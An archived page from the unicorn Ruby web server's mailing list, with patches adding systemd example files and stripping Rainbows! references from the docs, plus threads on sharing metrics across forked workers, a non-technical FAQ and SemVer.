+++ b/lib/unicorn/http_server.rb
@@ -36,7 +36,7 @@ class Unicorn::HttpServer
   # or even different installations of the same applications without
   # downtime.  Keys of this constant Hash are described as follows:
   #
-  # * 0 - the path to the unicorn/unicorn_rails executable
+  # * 0 - the path to the unicorn executable
   # * :argv - a deep copy of the ARGV array the executable originally saw
   # * :cwd - the working directory of the application, this is where
   # you originally started Unicorn.
@@ -45,7 +45,7 @@ class Unicorn::HttpServer
   # you can set the following in your Unicorn config file, HUP and then
   # continue with the traditional USR2 + QUIT upgrade steps:
   #
-  #   Unicorn::HttpServer::START_CTX[0] = "/home/bofh/2.2.0/bin/unicorn"
+  #   Unicorn::HttpServer::START_CTX[0] = "/home/bofh/2.3.0/bin/unicorn"
   START_CTX = {
     :argv => ARGV.map(&:dup),
     0 => $0.dup,
-- 
EW

^ permalink raw reply related	[relevance 4%]

* [PATCH] examples: add systemd socket and service files
@ 2015-11-17 21:45  2% Eric Wong
  0 siblings, 0 replies; 200+ results
From: Eric Wong @ 2015-11-17 21:45 UTC (permalink / raw)
  To: unicorn-public; +Cc: Eric Wong

Since we have init scripts, we ought to have the equivalent for
systemd users who cannot upgrade via the normal SIGUSR2 mechanism;
but can use multiple services: "unicorn@1" + h"unicorn@2" to
accomplish the same thing.

Based on examples by Christos Trochalakis <yatiohi@ideopolis.gr>

ref:
http://bogomips.org/unicorn-public/20150708130821.GA1361@luke.ws.skroutz.gr/
---
 examples/unicorn.socket   | 11 +++++++++++
 examples/unicorn@.service | 26 ++++++++++++++++++++++++++
 2 files changed, 37 insertions(+)
 create mode 100644 examples/unicorn.socket
 create mode 100644 examples/unicorn@.service

diff --git a/examples/unicorn.socket b/examples/unicorn.socket
new file mode 100644
index 0000000..7d5f773
--- /dev/null
+++ b/examples/unicorn.socket
@@ -0,0 +1,11 @@
+# ==> /etc/systemd/system/unicorn.socket <==
+[Unit]
+Description = unicorn sockets
+
+[Socket]
+ListenStream = 127.0.0.1:8080
+ListenStream = /tmp/path/to/.unicorn.sock
+Service = unicorn@1.service
+
+[Install]
+WantedBy = sockets.target
diff --git a/examples/unicorn@.service b/examples/unicorn@.service
new file mode 100644
index 0000000..b058da5
--- /dev/null
+++ b/examples/unicorn@.service
@@ -0,0 +1,26 @@
+# ==> /etc/systemd/system/unicorn@.service <==
+# Since SIGUSR2 upgrades do not work under systemd, this service file
+# allows starting two simultaneous services during upgrade time
+# (e.g. unicorn@1 unicorn@2) with the intention that they take
+# turns running in-between upgrades.  This should allow upgrading
+# without downtime.
+
+[Unit]
+Description = unicorn Rack application server %i
+Wants = unicorn.socket
+After = unicorn.socket
+
+[Service]
+ExecStart = /usr/bin/unicorn -c /path/to/unicorn.conf.rb /path/to/config.ru
+Sockets = unicorn.socket
+KillSignal = SIGQUIT
+User = nobody
+Group = nogroup
+ExecReload = /bin/kill -HUP $MAINPID
+
+# This is based on the Unicorn::Configurator#timeout directive,
+# adding a few seconds for scheduling differences:
+TimeoutStopSec = 62
+
+[Install]
+WantedBy = multi-user.target
-- 
EW


^ permalink raw reply related	[relevance 2%]

* Re: Shared Metrics Between Workers
  @ 2015-11-13 20:54  3%     ` Eric Wong
  0 siblings, 0 replies; 200+ results
From: Eric Wong @ 2015-11-13 20:54 UTC (permalink / raw)
  To: Jeff Utter; +Cc: unicorn-public

Jeff Utter <jeff.utter@firespring.com> wrote:
> On November 12, 2015 at 7:23:13 PM, Eric Wong (e@80x24.org) wrote:
> > You don't have to return all the data you'd aggregate with raindrops,  
> > though. Just what was requested.  
> 
> Just to make sure I understand this correctly though, in order for the
> metrics to be available between workers, the raindrops structs would
> need to be setup for each metric before unicorn forks? 

Yes.  But most (if not all) metrics you'd care about will need
aggregation, and thus must be known/aggregated for the lifetime
of a process, correct?

> > GDBM (in the stdlib), SQLite, RRD, or any "on-filesystem"[1] data store  
> > should work, even. If you do have a lot of stats; batch the updates  
> > locally (per-worker) and write them to a shared area periodically.
> 
> Are you suggesting this data store would be shared between workers or
> one per worker (and whatever displays the metrics would read all the
> stores)? I tried sharing between workers with DBM and GDBM and both of
> them end up losing metrics due to being overwritten by other threads.
> I imagine I would have to lock the file whenever one is writing, which
> would block other workers (not ideal). Out of the box PStore works
> fine for this (surprisingly). I'm guessing it does file locks behind
> the scenes.

The data in the on-filesystem store would be shared across processes.
But you'd probably want to aggregate locally in a hash before flushing
periodically.

You're probably losing data because DB file descriptors are shared
across fork.  You need to open DBs/connections after forking.  With any
DB, you can't expect to open/share open file descriptors across fork.

You can safely share UDP sockets across fork, and likely SCTP if
implemented in the kernel (I haven't tried).  But any userland wrappers
on top of the UDP socket (e.g. statsd, as Michael mentioned) will need
to be checked for fork-friendliness.

> Right now I'm thinking that the best way to handle this would be one
> data store per worker and then whatever reads the metrics scrapes them
> all read-only. My biggest concern with this approach is knowing which
> data-stores are valid. I suppose I could put them all in a folder
> based off the parent's pid. However, would it be possible that some
> could be orphaned if a worker is killed by the master? I would need
> some way for the master to communicate to the collector (probably in a
> worker) what other workers are actively running. Is that possible?

I don't think you to worry about all that.  You'd want stats even for
dead workers to stick around if they were running the same code as
current worker.

OTOH, you probably want to reset/drop stats on new deploys;
so maybe key the stats based on the version of the app you're running.

I also forget to mention I've used memcached for some stats, too.  It's
great when the data is fast-expiring, disposable and needs to be shared
across several machines; not just processes within the same host.

^ permalink raw reply	[relevance 3%]

* unicorn non-technical FAQ
@ 2015-10-14 20:12  2% Eric Wong
  0 siblings, 0 replies; 200+ results
From: Eric Wong @ 2015-10-14 20:12 UTC (permalink / raw)
  To: unicorn-public

Maybe this should be on the website somewhere, but the mailing list
archives are quite accessible nowadays.

Fwiw, I tend to followup publically (anonymized content) with technical
stuff to the private email address <unicorn@bogomips.org>, but never
publically address the non-technical questions.  But some of the same
questions come up over and over, so I figure an FAQ might help.


Q: Can I use your logo?

A: What logo?  This project has never had a logo and never will.
   Logos are a waste of bandwidth, processing power, and
   yet-another potential exploitable code execution and/or
   denial-of-service vector.

   Ask the webmaster of the site you saw the logo on.


Q: Can you speak at so-and-so conference?

A: I do not speak.  Speech is synchronous and I will inevitably
   speak too fast for some, too slow for others; all while wasting
   CPU power and bandwidth to encode and distribute audio.

   Text is much more efficient as the reader can read at their
   own pace, skim over uninteresting parts, scan, etc.
   Text is far cheaper to distribute, archive and search than audio.

   Besides, unicorn has been technically obsolete since the early 90s,
   there's nothing interesting to talk about.  Read the source,
   mailing list archives, git commit history, etc. instead.


Q: May I interview you?

A: You already started :)  I have plain-text email and nothing else.

^ permalink raw reply	[relevance 2%]

* Re: Request to follow SemVer/mention it in homepage
  2015-09-29  9:26  3%   ` Jérémy Lecour
@ 2015-09-29 19:43  0%     ` Eric Wong
  0 siblings, 0 replies; 200+ results
From: Eric Wong @ 2015-09-29 19:43 UTC (permalink / raw)
  To: Jérémy Lecour; +Cc: Pirate Praveen, unicorn-public

Jérémy Lecour <jeremy.lecour@gmail.com> wrote:
> On Tue, Sep 29, 2015 at 9:36 AM, Eric Wong <e@80x24.org> wrote:
> > Tying a Rack app to unicorn is totally, completely wrong and defeats the
> > point of Rack.
> 
> I completely agree with that statement.
> 
> However, having an app with hard dependency on a specific app server
> is not the same a providing a default setup for a given app server.
> 
> For example, an app like Gitlab, Discourse or whatever might provide a
> default good configuration for Unicorn, a set of optimisations in the
> context of a Unicorn (pre/post fork instructions…) and have something
> that works great out of the box, even if it's not restricted to
> Unicorn.

Right, Debian has Recommends/Suggests: fields for soft dependencies; but
I still consider that overkill.

> Someone who would want to change to Passenger, Puma or else would have
> to adapt the configuration and port the optimizations, but the app
> would work the same as with Unicorn, without crippled features.
> Someone who wouldn't change or tweak anything would have a good
> setting by default.

Perhaps there could be per-server Debian packages such as:

	gitlab-webrick  (should be the default)
	gitlab-puma
	gitlab-passenger
	gitlab-unicorn
	...

Given unicorn has always required the use of nginx for exposure to
public clients, unicorn is perhaps the worst choice as a default
server for people unwilling to read documentation and edit config
files.

^ permalink raw reply	[relevance 0%]

* Re: Request to follow SemVer/mention it in homepage
  @ 2015-09-29  9:26  3%   ` Jérémy Lecour
  2015-09-29 19:43  0%     ` Eric Wong
  0 siblings, 1 reply; 200+ results
From: Jérémy Lecour @ 2015-09-29  9:26 UTC (permalink / raw)
  To: Eric Wong; +Cc: Pirate Praveen, unicorn-public

On Tue, Sep 29, 2015 at 9:36 AM, Eric Wong <e@80x24.org> wrote:
> Tying a Rack app to unicorn is totally, completely wrong and defeats the
> point of Rack.

I completely agree with that statement.

However, having an app with hard dependency on a specific app server
is not the same a providing a default setup for a given app server.

For example, an app like Gitlab, Discourse or whatever might provide a
default good configuration for Unicorn, a set of optimisations in the
context of a Unicorn (pre/post fork instructions…) and have something
that works great out of the box, even if it's not restricted to
Unicorn.
Someone who would want to change to Passenger, Puma or else would have
to adapt the configuration and port the optimizations, but the app
would work the same as with Unicorn, without crippled features.
Someone who wouldn't change or tweak anything would have a good
setting by default.

-- 
Jérémy Lecour :
http://jeremy.wordpress.com - http://twitter.com/jlecour

^ permalink raw reply	[relevance 3%]

* [PATCH] doc: remove references to old servers
@ 2015-07-15 22:05  2% Eric Wong
  0 siblings, 0 replies; 200+ results
From: Eric Wong @ 2015-07-15 22:05 UTC (permalink / raw)
  To: unicorn-public

They'll continue to be maintained, but we're no longer advertising
them.  Also, favor lowercase "unicorn" while we're at it since that
matches the executable and gem name to avoid unnecessary escaping
for RDoc.
---
 Application_Timeouts             |  6 +++---
 KNOWN_ISSUES                     | 14 +++++++-------
 Links                            | 30 ++++++++++++++----------------
 PHILOSOPHY                       |  6 ------
 README                           | 32 ++++++++++++++++----------------
 Sandbox                          |  2 +-
 TUNING                           | 10 +++++-----
 examples/nginx.conf              | 21 ++++++++++-----------
 ext/unicorn_http/unicorn_http.rl |  2 +-
 lib/unicorn.rb                   |  6 +++---
 lib/unicorn/configurator.rb      | 24 ++++++++++--------------
 lib/unicorn/http_server.rb       |  4 ++--
 lib/unicorn/socket_helper.rb     |  8 +++-----
 lib/unicorn/util.rb              |  2 +-
 lib/unicorn/worker.rb            |  4 ++--
 15 files changed, 78 insertions(+), 93 deletions(-)

diff --git a/Application_Timeouts b/Application_Timeouts
index 5f0370d..561a1cc 100644
--- a/Application_Timeouts
+++ b/Application_Timeouts
@@ -4,10 +4,10 @@ This article focuses on _application_ setup for Rack applications, but
 can be expanded to all applications that connect to external resources
 and expect short response times.
 
-This article is not specific to \Unicorn, but exists to discourage
+This article is not specific to unicorn, but exists to discourage
 the overuse of the built-in
 {timeout}[link:Unicorn/Configurator.html#method-i-timeout] directive
-in \Unicorn.
+in unicorn.
 
 == ALL External Resources Are Considered Unreliable
 
@@ -71,7 +71,7 @@ handle network/server failures.
 == The Last Line Of Defense
 
 The {timeout}[link:Unicorn/Configurator.html#method-i-timeout] mechanism
-in \Unicorn is an extreme solution that should be avoided whenever
+in unicorn is an extreme solution that should be avoided whenever
 possible.  It will help catch bugs in your application where and when
 your application forgets to use timeouts, but it is expensive as it
 kills and respawns a worker process.
diff --git a/KNOWN_ISSUES b/KNOWN_ISSUES
index 1950223..6b80517 100644
--- a/KNOWN_ISSUES
+++ b/KNOWN_ISSUES
@@ -13,7 +13,7 @@ acceptable solution.  Those issues are documented here.
 
 * PRNGs (pseudo-random number generators) loaded before forking
   (e.g. "preload_app true") may need to have their internal state
-  reset in the after_fork hook.  Starting with \Unicorn 3.6.1, we
+  reset in the after_fork hook.  Starting with unicorn 3.6.1, we
   have builtin workarounds for Kernel#rand and OpenSSL::Random users,
   but applications may use other PRNGs.
 
@@ -36,13 +36,13 @@ acceptable solution.  Those issues are documented here.
 
 * Under some versions of Ruby 1.8, it is necessary to call +srand+ in an
   after_fork hook to get correct random number generation.  We have a builtin
-  workaround for this starting with \Unicorn 3.6.1
+  workaround for this starting with unicorn 3.6.1
 
   See http://blade.nagaokaut.ac.jp/cgi-bin/scat.rb/ruby/ruby-core/36450
 
 * On Ruby 1.8 prior to Ruby 1.8.7-p248, *BSD platforms have a broken
   stdio that causes failure for file uploads larger than 112K.  Upgrade
-  your version of Ruby or continue using Unicorn 1.x/3.4.x.
+  your version of Ruby or continue using unicorn 1.x/3.4.x.
 
 * Under Ruby 1.9.1, methods like Array#shuffle and Array#sample will
   segfault if called after forking.  Upgrade to Ruby 1.9.2 or call
@@ -53,12 +53,12 @@ acceptable solution.  Those issues are documented here.
 
 * Rails 2.3.2 bundles its own version of Rack.  This may cause subtle
   bugs when simultaneously loaded with the system-wide Rack Rubygem
-  which Unicorn depends on.  Upgrading to Rails 2.3.4 (or later) is
+  which unicorn depends on.  Upgrading to Rails 2.3.4 (or later) is
   strongly recommended for all Rails 2.3.x users for this (and security
   reasons).  Rails 2.2.x series (or before) did not bundle Rack and are
   should be unnaffected.  If there is any reason which forces your
   application to use Rails 2.3.2 and you have no other choice, then
-  you may edit your Unicorn gemspec and remove the Rack dependency.
+  you may edit your unicorn gemspec and remove the Rack dependency.
 
   ref: http://mid.gmane.org/20091014221552.GA30624@dcvr.yhbt.net
   Note: the workaround described in the article above only made
@@ -71,9 +71,9 @@ acceptable solution.  Those issues are documented here.
     set :env, :production
     set :run, false
   Since this is no longer an issue with Sinatra 0.9.x apps, this will not be
-  fixed on our end.  Since Unicorn is itself the application launcher, the
+  fixed on our end.  Since unicorn is itself the application launcher, the
   at_exit handler used in old Sinatra always caused Mongrel to be launched
-  whenever a Unicorn worker was about to exit.
+  whenever a unicorn worker was about to exit.
 
   Also remember we're capable of replacing the running binary without dropping
   any connections regardless of framework :)
diff --git a/Links b/Links
index 5a586c1..ad05afd 100644
--- a/Links
+++ b/Links
@@ -1,13 +1,13 @@
 = Related Projects
 
-If you're interested in \Unicorn, you may be interested in some of the projects
+If you're interested in unicorn, you may be interested in some of the projects
 listed below.  If you have any links to add/change/remove, please tell us at
 mailto:unicorn-public@bogomips.org!
 
 == Disclaimer
 
-The \Unicorn project is not responsible for the content in these links.
-Furthermore, the \Unicorn project has never, does not and will never endorse:
+The unicorn project is not responsible for the content in these links.
+Furthermore, the unicorn project has never, does not and will never endorse:
 
 * any for-profit entities or services
 * any non-{Free Software}[http://www.gnu.org/philosophy/free-sw.html]
@@ -15,13 +15,13 @@ Furthermore, the \Unicorn project has never, does not and will never endorse:
 The existence of these links does not imply endorsement of any entities
 or services behind them.
 
-=== For use with \Unicorn
+=== For use with unicorn
 
 * {Bluepill}[https://github.com/arya/bluepill] -
   a simple process monitoring tool written in Ruby
 
 * {golden_brindle}[https://github.com/simonoff/golden_brindle] - tool to
-  manage multiple \Unicorn instances/applications on a single server
+  manage multiple unicorn instances/applications on a single server
 
 * {raindrops}[http://raindrops.bogomips.org/] - real-time stats for
   preforking Rack servers
@@ -29,27 +29,25 @@ or services behind them.
 * {UnXF}[http://bogomips.org/unxf/]  Un-X-Forward* the Rack environment,
   useful since unicorn is designed to be deployed behind a reverse proxy.
 
-=== \Unicorn is written to work with
+=== unicorn is written to work with
 
 * {Rack}[http://rack.github.io/] - a minimal interface between webservers
   supporting Ruby and Ruby frameworks
 
 * {Ruby}[https://www.ruby-lang.org/en/] - the programming language of
-  Rack and \Unicorn
+  Rack and unicorn
 
-* {nginx}[http://nginx.org/] - the reverse proxy for use with \Unicorn
+* {nginx}[http://nginx.org/] - the reverse proxy for use with unicorn
 
-* {kgio}[http://bogomips.org/kgio/] - the I/O library written for \Unicorn
+* {kgio}[http://bogomips.org/kgio/] - the I/O library written for unicorn
+  (deprecated and functionality being mainlined into Ruby)
 
 === Derivatives
 
-* {Green Unicorn}[http://gunicorn.org/] - a Python version of \Unicorn
+* {Green Unicorn}[http://gunicorn.org/] - a Python version of unicorn
 
-* {Rainbows!}[http://rainbows.bogomips.org/] - \Unicorn for sleepy
-  apps and slow clients (historical).
-
-* {yahns}[http://yahns.yhbt.net/] - like Rainbows!, but with fewer options
-  and designed for energy efficiency on idle sites.
+* {yahns}[http://yahns.yhbt.net/] - the complete opposite of unicorn in
+  every imaginable way.  Designed for energy efficiency on idle sites.
 
 === Prior Work
 
@@ -57,4 +55,4 @@ or services behind them.
   unicorn is based on
 
 * {david}[http://bogomips.org/david.git] - a tool to explain why you need
-  nginx in front of \Unicorn
+  nginx in front of unicorn
diff --git a/PHILOSOPHY b/PHILOSOPHY
index 18b2d82..feb83d9 100644
--- a/PHILOSOPHY
+++ b/PHILOSOPHY
@@ -137,9 +137,3 @@ unicorn is highly inefficient for Comet/reverse-HTTP/push applications
 where the HTTP connection spends a large amount of time idle.
 Nevertheless, the ease of troubleshooting, debugging, and management of
 unicorn may still outweigh the drawbacks for these applications.
-
-The {Rainbows!}[http://rainbows.bogomips.org/] aims to fill the gap for
-odd corner cases where the nginx + unicorn combination is not enough.
-While Rainbows! management/administration is largely identical to
-unicorn, Rainbows! is far more ambitious and has seen little real-world
-usage.
diff --git a/README b/README
index bd626e9..dc121d3 100644
--- a/README
+++ b/README
@@ -1,10 +1,10 @@
-= Unicorn: Rack HTTP server for fast clients and Unix
+= unicorn: Rack HTTP server for fast clients and Unix
 
-\Unicorn is an HTTP server for Rack applications designed to only serve
+unicorn is an HTTP server for Rack applications designed to only serve
 fast clients on low-latency, high-bandwidth connections and take
 advantage of features in Unix/Unix-like kernels.  Slow clients should
 only be served by placing a reverse proxy capable of fully buffering
-both the the request and response in between \Unicorn and slow clients.
+both the the request and response in between unicorn and slow clients.
 
 == Features
 
@@ -15,9 +15,9 @@ both the the request and response in between \Unicorn and slow clients.
 * Compatible with Ruby 1.9.3 and later.
   unicorn 4.8.x will remain supported for Ruby 1.8 users.
 
-* Process management: \Unicorn will reap and restart workers that
+* Process management: unicorn will reap and restart workers that
   die from broken apps.  There is no need to manage multiple processes
-  or ports yourself.  \Unicorn can spawn and manage any number of
+  or ports yourself.  unicorn can spawn and manage any number of
   worker processes you choose to scale to your backend.
 
 * Load balancing is done entirely by the operating system kernel.
@@ -33,11 +33,11 @@ both the the request and response in between \Unicorn and slow clients.
 * Builtin reopening of all log files in your application via
   USR1 signal.  This allows logrotate to rotate files atomically and
   quickly via rename instead of the racy and slow copytruncate method.
-  \Unicorn also takes steps to ensure multi-line log entries from one
+  unicorn also takes steps to ensure multi-line log entries from one
   request all stay within the same file.
 
 * nginx-style binary upgrades without losing connections.
-  You can upgrade \Unicorn, your entire application, libraries
+  You can upgrade unicorn, your entire application, libraries
   and even your Ruby interpreter without dropping clients.
 
 * before_fork and after_fork hooks in case your application
@@ -60,15 +60,15 @@ both the the request and response in between \Unicorn and slow clients.
 
 == License
 
-\Unicorn is copyright 2009 by all contributors (see logs in git).
+unicorn is copyright 2009 by all contributors (see logs in git).
 It is based on Mongrel 1.1.5.
 Mongrel is copyright 2007 Zed A. Shaw and contributors.
 
-\Unicorn is licensed under (your choice) of the GPLv2 or later
+unicorn is licensed under (your choice) of the GPLv2 or later
 (GPLv3+ preferred), or Ruby (1.8)-specific terms.
 See the included LICENSE file for details.
 
-\Unicorn is 100% Free Software.
+unicorn is 100% Free Software.
 
 == Install
 
@@ -108,17 +108,17 @@ In RAILS_ROOT, run:
 
   unicorn_rails
 
-\Unicorn will bind to all interfaces on TCP port 8080 by default.
+unicorn will bind to all interfaces on TCP port 8080 by default.
 You may use the +--listen/-l+ switch to bind to a different
 address:port or a UNIX socket.
 
 === Configuration File(s)
 
-\Unicorn will look for the config.ru file used by rackup in APP_ROOT.
+unicorn will look for the config.ru file used by rackup in APP_ROOT.
 
-For deployments, it can use a config file for \Unicorn-specific options
+For deployments, it can use a config file for unicorn-specific options
 specified by the +--config-file/-c+ command-line switch.  See
-Unicorn::Configurator for the syntax of the \Unicorn-specific options.
+Unicorn::Configurator for the syntax of the unicorn-specific options.
 The default settings are designed for maximum out-of-the-box
 compatibility with existing applications.
 
@@ -130,7 +130,7 @@ supported.  Run `unicorn -h` to see command-line options.
 There is NO WARRANTY whatsoever if anything goes wrong, but
 {let us know}[link:ISSUES.html] and we'll try our best to fix it.
 
-\Unicorn is designed to only serve fast clients either on the local host
+unicorn is designed to only serve fast clients either on the local host
 or a fast LAN.  See the PHILOSOPHY and DESIGN documents for more details
 regarding this.
 
@@ -140,6 +140,6 @@ All feedback (bug reports, user/development dicussion, patches, pull
 requests) go to the mailing list/newsgroup.  See the ISSUES document for
 information on the {mailing list}[mailto:unicorn-public@bogomips.org].
 
-For the latest on \Unicorn releases, you may also finger us at
+For the latest on unicorn releases, you may also finger us at
 unicorn@bogomips.org or check our NEWS page (and subscribe to our Atom
 feed).
diff --git a/Sandbox b/Sandbox
index a6c3fe7..997b92f 100644
--- a/Sandbox
+++ b/Sandbox
@@ -1,4 +1,4 @@
-= Tips for using \Unicorn with Sandbox installation tools
+= Tips for using unicorn with Sandbox installation tools
 
 Since unicorn includes executables and is usually used to start a Ruby
 process, there are certain caveats to using it with tools that sandbox
diff --git a/TUNING b/TUNING
index 6a6d7db..247090b 100644
--- a/TUNING
+++ b/TUNING
@@ -1,10 +1,10 @@
-= Tuning \Unicorn
+= Tuning unicorn
 
-\Unicorn performance is generally as good as a (mostly) Ruby web server
+unicorn performance is generally as good as a (mostly) Ruby web server
 can provide.  Most often the performance bottleneck is in the web
 application running on Unicorn rather than Unicorn itself.
 
-== \Unicorn Configuration
+== unicorn Configuration
 
 See Unicorn::Configurator for details on the config file format.
 +worker_processes+ is the most-commonly needed tuning parameter.
@@ -14,7 +14,7 @@ See Unicorn::Configurator for details on the config file format.
 * worker_processes should be scaled to the number of processes your
   backend system(s) can support.  DO NOT scale it to the number of
   external network clients your application expects to be serving.
-  \Unicorn is NOT for serving slow clients, that is the job of nginx.
+  unicorn is NOT for serving slow clients, that is the job of nginx.
 
 * worker_processes should be *at* *least* the number of CPU cores on
   a dedicated server (unless you do not have enough memory).
@@ -58,7 +58,7 @@ See Unicorn::Configurator for details on the config file format.
 * UNIX domain sockets are slightly faster than TCP sockets, but only
   work if nginx is on the same machine.
 
-== Other \Unicorn settings
+== Other unicorn settings
 
 * Setting "preload_app true" can allow copy-on-write-friendly GC to
   be used to save memory.  It will probably not work out of the box with
diff --git a/examples/nginx.conf b/examples/nginx.conf
index a68fe6f..0583c1f 100644
--- a/examples/nginx.conf
+++ b/examples/nginx.conf
@@ -1,5 +1,5 @@
 # This is example contains the bare mininum to get nginx going with
-# Unicorn or Rainbows! servers.  Generally these configuration settings
+# unicorn servers.  Generally these configuration settings
 # are applicable to other HTTP application servers (and not just Ruby
 # ones), so if you have one working well for proxying another app
 # server, feel free to continue using it.
@@ -44,8 +44,8 @@ http {
   # click tracking!
   access_log /path/to/nginx.access.log combined;
 
-  # you generally want to serve static files with nginx since neither
-  # Unicorn nor Rainbows! is optimized for it at the moment
+  # you generally want to serve static files with nginx since
+  # unicorn is not and will never be optimized for it
   sendfile on;
 
   tcp_nopush on; # off may be better for *some* Comet/long-poll stuff
@@ -67,10 +67,10 @@ http {
              text/javascript application/x-javascript
              application/atom+xml;
 
-  # this can be any application server, not just Unicorn/Rainbows!
+  # this can be any application server, not just unicorn
   upstream app_server {
     # fail_timeout=0 means we always retry an upstream even if it failed
-    # to return a good HTTP response (in case the Unicorn master nukes a
+    # to return a good HTTP response (in case the unicorn master nukes a
     # single worker for timing out).
 
     # for UNIX domain socket setups:
@@ -132,12 +132,11 @@ http {
       # redirects, we set the Host: header above already.
       proxy_redirect off;
 
-      # set "proxy_buffering off" *only* for Rainbows! when doing
-      # Comet/long-poll/streaming.  It's also safe to set if you're using
-      # only serving fast clients with Unicorn + nginx, but not slow
-      # clients.  You normally want nginx to buffer responses to slow
-      # clients, even with Rails 3.1 streaming because otherwise a slow
-      # client can become a bottleneck of Unicorn.
+      # It's also safe to set if you're using only serving fast clients
+      # with unicorn + nginx, but not slow clients.  You normally want
+      # nginx to buffer responses to slow clients, even with Rails 3.1
+      # streaming because otherwise a slow client can become a bottleneck
+      # of unicorn.
       #
       # The Rack application may also set "X-Accel-Buffering (yes|no)"
       # in the response headers do disable/enable buffering on a
diff --git a/ext/unicorn_http/unicorn_http.rl b/ext/unicorn_http/unicorn_http.rl
index a5f069d..046ccb5 100644
--- a/ext/unicorn_http/unicorn_http.rl
+++ b/ext/unicorn_http/unicorn_http.rl
@@ -38,7 +38,7 @@ static VALUE set_maxhdrlen(VALUE self, VALUE len)
   return UINT2NUM(MAX_HEADER_LEN = NUM2UINT(len));
 }
 
-/* keep this small for Rainbows! since every client has one */
+/* keep this small for other servers (e.g. yahns) since every client has one */
 struct http_parser {
   int cs; /* Ragel internal state */
   unsigned int flags;
diff --git a/lib/unicorn.rb b/lib/unicorn.rb
index 9fdcb8e..b0e6bd1 100644
--- a/lib/unicorn.rb
+++ b/lib/unicorn.rb
@@ -10,10 +10,10 @@ require 'kgio'
 # enough functionality to service web application requests fast as possible.
 # :startdoc:
 
-# \Unicorn exposes very little of an user-visible API and most of its
-# internals are subject to change.  \Unicorn is designed to host Rack
+# unicorn exposes very little of an user-visible API and most of its
+# internals are subject to change.  unicorn is designed to host Rack
 # applications, so applications should be written against the Rack SPEC
-# and not \Unicorn internals.
+# and not unicorn internals.
 module Unicorn
 
   # Raised inside TeeInput when a client closes the socket inside the
diff --git a/lib/unicorn/configurator.rb b/lib/unicorn/configurator.rb
index 02f6b6b..4da19bb 100644
--- a/lib/unicorn/configurator.rb
+++ b/lib/unicorn/configurator.rb
@@ -1,7 +1,7 @@
 # -*- encoding: binary -*-
 require 'logger'
 
-# Implements a simple DSL for configuring a \Unicorn server.
+# Implements a simple DSL for configuring a unicorn server.
 #
 # See http://unicorn.bogomips.org/examples/unicorn.conf.rb and
 # http://unicorn.bogomips.org/examples/unicorn.conf.minimal.rb
@@ -282,20 +282,19 @@ class Unicorn::Configurator
   #   Setting this to +true+ can make streaming responses in Rails 3.1
   #   appear more quickly at the cost of slightly higher bandwidth usage.
   #   The effect of this option is most visible if nginx is not used,
-  #   but nginx remains highly recommended with \Unicorn.
+  #   but nginx remains highly recommended with unicorn.
   #
   #   This has no effect on UNIX sockets.
   #
-  #   Default: +true+ (Nagle's algorithm disabled) in \Unicorn,
-  #   +true+ in Rainbows!  This defaulted to +false+ in \Unicorn
-  #   3.x
+  #   Default: +true+ (Nagle's algorithm disabled) in unicorn
+  #   This defaulted to +false+ in unicorn 3.x
   #
   # [:tcp_nopush => true or false]
   #
   #   Enables/disables TCP_CORK in Linux or TCP_NOPUSH in FreeBSD
   #
   #   This prevents partial TCP frames from being sent out and reduces
-  #   wakeups in nginx if it is on a different machine.  Since \Unicorn
+  #   wakeups in nginx if it is on a different machine.  Since unicorn
   #   is only designed for applications that send the response body
   #   quickly without keepalive, sockets will always be flushed on close
   #   to prevent delays.
@@ -303,7 +302,7 @@ class Unicorn::Configurator
   #   This has no effect on UNIX sockets.
   #
   #   Default: +false+
-  #   This defaulted to +true+ in \Unicorn 3.4 - 3.7
+  #   This defaulted to +true+ in unicorn 3.4 - 3.7
   #
   # [:ipv6only => true or false]
   #
@@ -387,12 +386,10 @@ class Unicorn::Configurator
   #   and +false+ or +nil+ is synonymous for a value of zero.
   #
   #   A value of +1+ is a good optimization for local networks
-  #   and trusted clients.  For Rainbows! and Zbatery users, a higher
-  #   value (e.g. +60+) provides more protection against some
-  #   denial-of-service attacks.  There is no good reason to ever
-  #   disable this with a +zero+ value when serving HTTP.
+  #   and trusted clients.  There is no good reason to ever
+  #   disable this with a +zero+ value with unicorn.
   #
-  #   Default: 1 retransmit for \Unicorn, 60 for Rainbows! 0.95.0\+
+  #   Default: 1
   #
   # [:accept_filter => String]
   #
@@ -401,8 +398,7 @@ class Unicorn::Configurator
   #   This enables either the "dataready" or (default) "httpready"
   #   accept() filter under FreeBSD.  This is intended as an
   #   optimization to reduce context switches with common GET/HEAD
-  #   requests.  For Rainbows! and Zbatery users, this provides
-  #   some protection against certain denial-of-service attacks, too.
+  #   requests.
   #
   #   There is no good reason to change from the default.
   #
diff --git a/lib/unicorn/http_server.rb b/lib/unicorn/http_server.rb
index 0f97516..3dbfd3e 100644
--- a/lib/unicorn/http_server.rb
+++ b/lib/unicorn/http_server.rb
@@ -7,8 +7,8 @@
 #
 # Users do not need to know the internals of this class, but reading the
 # {source}[http://bogomips.org/unicorn.git/tree/lib/unicorn/http_server.rb]
-# is education for programmers wishing to learn how \Unicorn works.
-# See Unicorn::Configurator for information on how to configure \Unicorn.
+# is education for programmers wishing to learn how unicorn works.
+# See Unicorn::Configurator for information on how to configure unicorn.
 class Unicorn::HttpServer
   # :stopdoc:
   attr_accessor :app, :timeout, :worker_processes,
diff --git a/lib/unicorn/socket_helper.rb b/lib/unicorn/socket_helper.rb
index 812ac53..df8315e 100644
--- a/lib/unicorn/socket_helper.rb
+++ b/lib/unicorn/socket_helper.rb
@@ -5,14 +5,12 @@ require 'socket'
 module Unicorn
   module SocketHelper
 
-    # internal interface, only used by Rainbows!/Zbatery
+    # internal interface
     DEFAULTS = {
       # The semantics for TCP_DEFER_ACCEPT changed in Linux 2.6.32+
       # with commit d1b99ba41d6c5aa1ed2fc634323449dd656899e9
-      # This change shouldn't affect Unicorn users behind nginx (a
-      # value of 1 remains an optimization), but Rainbows! users may
-      # want to use a higher value on Linux 2.6.32+ to protect against
-      # denial-of-service attacks
+      # This change shouldn't affect unicorn users behind nginx (a
+      # value of 1 remains an optimization).
       :tcp_defer_accept => 1,
 
       # FreeBSD, we need to override this to 'dataready' if we
diff --git a/lib/unicorn/util.rb b/lib/unicorn/util.rb
index c7784bd..2f8bfeb 100644
--- a/lib/unicorn/util.rb
+++ b/lib/unicorn/util.rb
@@ -1,7 +1,7 @@
 # -*- encoding: binary -*-
 
 require 'fcntl'
-module Unicorn::Util
+module Unicorn::Util # :nodoc:
 
 # :stopdoc:
   def self.is_log?(fp)
diff --git a/lib/unicorn/worker.rb b/lib/unicorn/worker.rb
